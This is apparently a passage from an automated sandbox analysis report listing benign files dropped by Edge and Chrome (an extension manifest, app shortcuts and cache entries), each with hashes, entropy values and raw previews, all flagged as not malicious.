                                                                                                                                                                                                                                                                                    Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_933105069\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):962
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                    MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                    SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                    SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                    SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_933105069\b59ecd3e-9a1a-4101-9857-d975fa9794e7.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):11185
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                    MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                    SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                    SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                    SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 27 12:46:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2677
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9736970844231383
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:8oduTKe0HAidAKZdA19ehwiZUklqeh2y+3:85b7Zy
                                                                                                                                                                                                                                                                                    MD5:3C2F5C2FD851F5E7166F1277266C8D46
                                                                                                                                                                                                                                                                                    SHA1:91E4C16BA9D2E4B63E2450C27D74D0108421564A
                                                                                                                                                                                                                                                                                    SHA-256:1F32A5F84E49D42D019A0F47031F20A7EC3A8D81D9FECF96199C1EC2C88D3105
                                                                                                                                                                                                                                                                                    SHA-512:19A7B644B26DA3A9EE7B50624554CBE9CFFBE89C85734E98920A54B8E1906D7ACF2F3EDEDEEBF9813EFCDC781BCE13266D550EF2E1CEF8A049C3EEC96E69B123
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,.....).eX..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.m....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.m....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.m....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.m..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.m...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............!.D.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 27 12:46:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2679
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.985887108657228
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:87duTKe0HAidAKZdA1weh/iZUkAQkqehJy+2:8wbJ9Q0y
                                                                                                                                                                                                                                                                                    MD5:D095B497AE360288DFAEEF676B57CB43
                                                                                                                                                                                                                                                                                    SHA1:631C2B5EBAB38A9A54760CBD6FE569C0FFB04DE3
                                                                                                                                                                                                                                                                                    SHA-256:355B9ACC85C1290FA92669FF75FEADB060865CE7C56A9CE5D531CEA107F4F3BB
                                                                                                                                                                                                                                                                                    SHA-512:2AE2AC2B8468FD45DAF589230312D7406E4168296EE5BD6C65EF5AA73C096917345C67243F12ABD862091741F49B207982307069C06141838729F7527120B7D5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,....-...eX..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.m....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.m....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.m....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.m..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.m...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............!.D.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2693
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.003362996129074
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:8xnduTKesHAidAKZdA14tseh7sFiZUkmgqeh7sny+BX:8xcbxnVy
                                                                                                                                                                                                                                                                                    MD5:06F6D5ED6EA3FA94924569BA08EE1494
                                                                                                                                                                                                                                                                                    SHA1:12C611413FE33B9B851EA85D2771DFD2613B286D
                                                                                                                                                                                                                                                                                    SHA-256:B75566C037398EB26AF9125E75E35F24B4DE9168FD252C9274207C244192947F
                                                                                                                                                                                                                                                                                    SHA-512:BDFDAECA12A78300829CFEB84C7DC165397D1F4F699D3EE248C573E2EDB14435C3BEB724C5640A2E7D75B03C74E58BAC651DE0754A40EF71ECF8A4B641BB5D0C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.m....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.m....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.m....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.m..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............!.D.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 27 12:46:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2681
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9889761957191534
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:8oduTKe0HAidAKZdA1vehDiZUkwqeh9y+R:85bKvy
                                                                                                                                                                                                                                                                                    MD5:ABE68B5A856734BD9B3ED7E24AC8A32E
                                                                                                                                                                                                                                                                                    SHA1:4E6D9132BCE72C45AFC2A2221E969BEB133B6C23
                                                                                                                                                                                                                                                                                    SHA-256:DB286113E70F2E06E5000B51DEFEDF120212412C4F59F259F8E2B4A9EEC03AEA
                                                                                                                                                                                                                                                                                    SHA-512:9E4D40B4011E524C0818A3F79E9CC1E130D0789B1901ADEE20EA4E0C6AE004D1EDDC944AA2BD0E892860902A21FD91EE9DF34735B2BAEF2CE7A2B90DA1CEA03E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,........eX..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.m....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.m....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.m....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.m..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.m...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............!.D.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 27 12:46:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2681
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9788269121564137
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:8ZduTKe0HAidAKZdA1hehBiZUk1W1qehjy+C:8abq9Dy
                                                                                                                                                                                                                                                                                    MD5:1880DE6E0C02C00DAFB9860FC378456F
                                                                                                                                                                                                                                                                                    SHA1:03501073BB46B627A077B1B846947A1F9D0D2535
                                                                                                                                                                                                                                                                                    SHA-256:EF1A8A6F0A72648E90A1438736578E7CA67E6EEE39FD0A85F6CDB37918EE5FF9
                                                                                                                                                                                                                                                                                    SHA-512:59247320C0D592D9CE6405C38AAD297894BD85D2437BA3E4048E9EE63176267D31E223B078397AA1D80577428D02D2974BA1EFD0D3B8F7E6587B5359467A85B8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,......#.eX..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.m....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.m....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.m....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.m..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.m...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............!.D.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 27 12:46:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2683
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9857034366484214
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:8aduTKe0HAidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbVy+yT+:8Pb0T/TbxWOvTbVy7T
                                                                                                                                                                                                                                                                                    MD5:76DD55EF589C8A69A60EB598BB8C44B7
                                                                                                                                                                                                                                                                                    SHA1:B6DE29C0A9B9D86743D4F5198D3FAA116870D3BE
                                                                                                                                                                                                                                                                                    SHA-256:29A972726CC700999F91151BCBAC89F74ABAED522E91A0CCBDF19603A9BEFCD7
                                                                                                                                                                                                                                                                                    SHA-512:685363778C31DE56DE689E5661ADE5395173C87B77881651A9DBEB7D20E5171A7A8AC4E5364F5E8A1935B836933AD6405B4423F7065B7994B1E913372B4E0ADC
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,....<h..eX..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.m....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.m....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.m....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.m..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.m...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............!.D.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                    Chrome Cache Entry: 449

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3663)
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):3668
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.843832784313439
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:bUTolifFd66666HxVMmIKOTdvNHVNuaIZfwKNKnSwWfQfffo:giQFd666667FOTRNHVAaIVNMn6
                                                                                                                                                                                                                                                                                    MD5:CD0CE2760DD45A135CB5ED57D78D8D4B
                                                                                                                                                                                                                                                                                    SHA1:AF67651D40861DAB2273D614AD73F22E2918EEF6
                                                                                                                                                                                                                                                                                    SHA-256:18FAF44E93505FDEC5D78A8904A20404981718593BB284101CFAC9039694D30F
                                                                                                                                                                                                                                                                                    SHA-512:491869197BA6958A1971748ACDEEA0CC8925D080D9087F83C074C1090C39EB0C51CD1FD09481095EB7B489907AD8BB337393FAE39BA3E15AD53F4B6FF48998C6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                    Preview:)]}'.["",["nintendo switch console","okc thunder vs indiana pacers prediction","kevin mccallister","dolphin stampede southern california","northeast ohio air quality alert","nasa astronauts stuck in space","walker buehler red sox","gingerbread gala monopoly go rewards"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"google:entityinfo":"CgovbS8wZzU4MTkxEg9Nb3ZpZSBjaGFyYWN0ZXIyow9kYXRhOmltYWdlL2pwZWc7YmFzZTY0LC85ai80QUFRU2taSlJnQUJBUUFBQVFBQkFBRC8yd0NFQUFrR0J3Z0hCZ2tJQndnS0Nna0xEUllQRFF3TURSc1VGUkFXSUIwaUlpQWRIeDhrS0RRc0pDWXhKeDhmTFQwdE1UVTNPam82SXlzL1JEODRRelE1T2pjQkNnb0tEUXdOR2c4UEdqY2xIeVUzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM04vL0FBQkVJQUVBQU5nTUJFUUFDRVFFREVRSC94QUFjQUFBQkJBTUJBQUFBQUFBQUFBQUFBQUFHQUFRSENBRURCUUwveEFBeUVBQUNBQVFFQXdjQ0JnTUFBQUFBQUFBQkFnQURCQkVGQmhJaEV6RkJCeUpSWVhHQmthR3hGR0tDN

                                                                                                                                                                                                                                                                                    Chrome Cache Entry: 450

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):29
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                                    MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                                    SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                                    SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                                    SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                    Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                                                                                                                                                                    Chrome Cache Entry: 451

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):132739
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4369848931472955
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:fQkJQ7O4N5dTm+syHEt4W3XdQ4Q6JuSr/nUW2i6o:f1Q7HTt/sHdQ4Q6JDfUW8o
                                                                                                                                                                                                                                                                                    MD5:FFCE4F102FA784D21F60A85DB90675A5
                                                                                                                                                                                                                                                                                    SHA1:ECE92FAD9F0F051830B61D11ECE8527DD70E0651
                                                                                                                                                                                                                                                                                    SHA-256:B547361679B06F23114A1EE22B046B772333EF6CDF825726BF492F1960E43871
                                                                                                                                                                                                                                                                                    SHA-512:08D1E7E365BAB119CD6E54C243B73415C6751204AADA6BEBFDE37FE7BB7FEA42291D190F0839D3315AD9F370CF1A767A432E154D7A529C0E730DB9DFF43670A6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
